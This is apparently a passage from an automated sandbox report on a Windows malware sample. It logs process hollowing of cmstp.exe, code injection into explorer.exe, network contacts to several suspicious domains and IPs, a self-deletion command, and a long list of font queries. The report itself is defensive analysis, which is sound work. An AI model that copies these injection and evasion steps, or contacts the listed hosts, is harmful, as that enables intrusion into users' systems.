          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04514F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04514F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04528794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04597794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04597794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04597794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04521B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04521B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.m678.xyz
          Source: C:\Windows\explorer.exeDomain query: www.buylocalclub.info
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.239.73 80
          Source: C:\Windows\explorer.exeDomain query: www.alfenas.info
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.adultpeace.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeMemory written: C:\Users\user\Desktop\QxVf0A9SFT.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 120000
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess created: C:\Users\user\Desktop\QxVf0A9SFT.exe C:\Users\user\Desktop\QxVf0A9SFT.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe'
          Source: explorer.exe, 00000014.00000000.329784447.00000000089FF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000014.00000000.311911048.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000014.00000000.311911048.0000000001640000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000014.00000000.343752151.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000014.00000000.311911048.0000000001640000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000014.00000000.311911048.0000000001640000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Users\user\Desktop\QxVf0A9SFT.exe VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
